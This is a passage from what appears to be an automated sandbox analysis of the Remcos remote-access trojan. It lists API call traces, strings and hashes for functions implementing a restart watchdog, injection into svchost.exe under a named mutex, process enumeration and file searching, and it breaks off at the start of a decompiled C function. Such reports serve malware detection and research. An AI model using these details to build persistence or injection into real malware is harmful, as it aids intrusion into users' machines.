                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A673
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A709
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A718
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040A72D
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?), ref: 0040A748
                                        • _wgetenv.MSVCRT ref: 0040A758
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A763
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A76E
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A77A
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A783
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A78C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7F0
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(\svchost.exe), ref: 0040A7FE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041BD70), ref: 0040A80C
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040A816
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A837
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A84B
                                        • Sleep.KERNEL32(000007D0), ref: 0040A85E
                                        • CloseHandle.KERNEL32 ref: 0040A8AA
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8B6
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8BF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@$Hstd@@V?$basic_string@$CloseG@1@@$D@2@@0@Open$HandleProcessV01@V10@0@$??4?$basic_string@G@2@@0@V01@@V10@Value_wgetenv$CreateCurrentLocalMutexObjectQuerySingleSleepTimeV10@@WaitY?$basic_string@printf
                                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[INFO]$\SysWOW64$\svchost.exe$\system32
                                        • API String ID: 2208868093-2207663338
                                        • Opcode ID: 9091c6b63f88cba4044878423eae5b724ce617bbc0aba149de81e8580702b54f
                                        • Instruction ID: 260755ff1fe0d3a0fcb30184a4449815193b010e4943e9dd02dd017fae915b1e
                                        • Opcode Fuzzy Hash: 9091c6b63f88cba4044878423eae5b724ce617bbc0aba149de81e8580702b54f
                                        • Instruction Fuzzy Hash: 82714272910509EFDB04BBE0EC4A9EE7B3CEF54345F404036F912A2191EB795985CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409A2F, Relevance: 80.7, APIs: 42, Strings: 4, Instructions: 228processsynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                        • Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                        • Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                        • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                        • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                        • Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409B88
                                        • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z.MSVCP60(?), ref: 00409BAF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BB8
                                        • CloseHandle.KERNEL32(?,00000002,00000000), ref: 00409BC1
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409BC8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BD7
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 00409BEB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BF4
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(Program Files\,00000000), ref: 00409C0E
                                        • wcslen.MSVCRT ref: 00409C25
                                        • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000), ref: 00409C31
                                        • ??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z.MSVCP60(?,?), ref: 00409C42
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C58
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C66
                                        • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj), ref: 00409C75
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409C84
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00409C93
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00409CA4
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00409CAE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,00000001), ref: 00409CCC
                                        • CloseHandle.KERNEL32(00000000), ref: 00409CE5
                                          • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409CEC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409CF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$??8std@@V?$basic_string@$?c_str@?$basic_string@D@2@@std@@D@std@@G@2@@0@$??0?$basic_string@Process32$??4?$basic_string@?begin@?$basic_string@CloseCreateG@1@@HandleNextV01@V01@@V12@$?assign@?$basic_string@?end@?$basic_string@?find@?$basic_string@?replace@?$basic_string@D@1@@FileFirstG@2@@0@0@G@2@@0@@ModuleMutexNameOpenProcessSnapshotToolhelp32V12@@wcslen
                                        • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                                        • API String ID: 2459104678-694575909
                                        • Opcode ID: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                        • Instruction ID: 7a0e813b4e10dd3dd77c68d554191e2bbc423507f4273ca30df3ab345c5067a4
                                        • Opcode Fuzzy Hash: 03b99ce6683c0f5c76c086758dcb553c68d35851c3aac7b75cd394d2696c36c8
                                        • Instruction Fuzzy Hash: 2D811E7280450DEBCF04AFA0EC499EE7B78EF48355F14407AF906A70A1DB755A8ACF58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00410586, Relevance: 78.3, APIs: 52, Instructions: 279fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00410595
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 004105AD
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004105BE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004105CD
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,00000000,00000001), ref: 00410617
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,00000001), ref: 00410624
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041062F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041063B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410648
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410655
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,?,?,?,00000000,00000001), ref: 00410679
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000,00000001), ref: 0041068B
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 00410694
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106A9
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106B3
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000,?,?,?,00000000,00000001), ref: 004106D0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004106DC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000,00000000,0041B310,00000000,00000002,0041B310,?), ref: 00410713
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,0041B310,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00410720
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,?), ref: 00410730
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,?), ref: 00410740
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,?), ref: 00410750
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0041075A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000005E), ref: 00410774
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410780
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041078C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410795
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041079E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107A7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004107B0
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004107C2
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00416A54), ref: 004107D6
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 004107E8
                                        • FindFirstFileW.KERNEL32(00000000), ref: 004107EF
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898), ref: 00410817
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 00410824
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410830
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00410850
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041085A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410866
                                        • FindNextFileW.KERNEL32(?,?), ref: 0041087C
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415A28), ref: 00410898
                                        • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000), ref: 0041089F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004108AB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004108CB
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004108D5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004108E1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004108FC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000005D), ref: 00410911
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041091A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041092B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410934
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@std@@$??0?$basic_string@G@2@@std@@$V?$basic_string@$Hstd@@V01@@$V10@0@$D@1@@D@2@@0@$?c_str@?$basic_string@G@2@@0@$?length@?$basic_string@V01@$??4?$basic_string@FileG@1@@V12@$??9std@@?begin@?$basic_string@?data@?$basic_string@?size@?$basic_string@?substr@?$basic_string@FindV10@$?end@?$basic_string@?find@?$basic_string@CreateFirstNextY?$basic_string@
                                        • String ID:
                                        • API String ID: 2968164691-0
                                        • Opcode ID: 5853c421a435e19894150a3264cd99b1a7bd38c59d92ad40cce819792ed43f29
                                        • Instruction ID: 811b7e3e4f446b35303200f11341a1ba311440e0dd0279f7ab7bb97a8af00616
                                        • Opcode Fuzzy Hash: 5853c421a435e19894150a3264cd99b1a7bd38c59d92ad40cce819792ed43f29
                                        • Instruction Fuzzy Hash: C3B11D72D0050DEBCB04EBA0EC59EEEB77CAF54345F148066F516A30A1EB745A89CF68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402B8A, Relevance: 75.5, APIs: 41, Strings: 2, Instructions: 291pipesleepfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E00402B8A(char _a4) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				void _v16;
				signed int _v20;
				long _v24;
				long _v28;
				void* _v44;
				char _v60;
				char _v76;
				char* _t54;
				int _t68;
				void* _t79;
				CHAR* _t80;
				int _t91;
				signed int _t120;
				void* _t136;
				CHAR* _t142;
				void* _t146;

